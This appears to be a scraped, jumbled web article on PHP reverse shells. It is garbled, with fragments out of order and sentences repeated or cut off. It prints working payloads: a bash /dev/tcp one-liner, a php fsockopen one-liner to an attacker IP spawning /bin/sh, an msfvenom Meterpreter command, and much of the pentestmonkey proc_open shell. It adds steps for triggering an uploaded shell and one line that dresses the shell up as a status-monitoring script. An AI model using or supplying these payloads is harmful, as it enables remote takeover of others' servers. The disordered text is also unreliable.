& /dev/tcp/10.10.10.10/443 0>&1'"); ?> Use code with caution.
msfvenom -p php/meterpreter_reverse_tcp LHOST=YOUR_IP LPORT=443 -f raw > reverse-shell.php
?>
This article explores what makes a PHP reverse shell effective, the top methods used by professionals, and how to protect your systems from unauthorized execution. What is a PHP Reverse Shell?
php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");' reverse shell php top
For persistent access, PHP Remote Shell functions like a "Swiss army knife".
Navigate to the URL where the file is hosted. Your browser will appear to "hang" or "load indefinitely"—this is a good sign! It means the script is currently running and holding the connection open. Step 4: Interact
A refreshed and actively maintained fork of the pentestmonkey script. This version includes workarounds for Windows—a platform where the original suffers from stream_set_blocking() and stream_select() limitations due to how Windows handles file descriptors from proc_open() . The script automatically detects the target OS, using /bin/sh for Unix-like systems and cmd.exe for Windows.
Reverse shells are powerful tools used by system administrators for recovery and by security researchers for testing. However, unauthorized access to computer systems is illegal. Always ensure you have explicit, written permission before testing these techniques on any network or server. & /dev/tcp/10
Different scenarios require different scripts depending on the server configuration, disabled functions, and available tools. Below are the top methods used in modern security audits. 1. The Industry Standard: Pentestmonkey PHP Reverse Shell
array("pipe", "r"), // stdin 1 => array("pipe", "w"), // stdout 2 => array("pipe", "w") // stderr ); $process = proc_open('/bin/sh', $descriptorspec, $pipes); if (is_resource($process)) stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); while (true) if (feof($sock)) break; if (feof($pipes[1])) break; $read = array($sock, $pipes[1], $pipes[2]); $write = null; $except = null; if (stream_select($read, $write, $except, 1) > 0) if (in_array($sock, $read)) fwrite($pipes[0], fread($sock, 1024)); if (in_array($pipes[1], $read)) fwrite($sock, fread($pipes[1], 1024)); if (in_array($pipes[2], $read)) fwrite($sock, fread($pipes[2], 1024)); fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); ?> Use code with caution. 2. PentestMonkey PHP Reverse Shell
What your web server runs on (Linux or Windows?) The web server software in use (Apache, Nginx, or IIS?)
This implementation establishes a raw TCP socket back to an administrative listener and streams the output of system status utilities over the wire. It means the script is currently running and
This generates a Meterpreter reverse TCP payload for PHP. Unlike standalone netcat shells, Meterpreter provides a rich post-exploitation environment with capabilities like file system browsing, process migration, privilege escalation, and keylogging.
A minimal payload used for quick execution via a command injection vulnerability:
executes a PHP script that initiates an outbound connection to the attacker.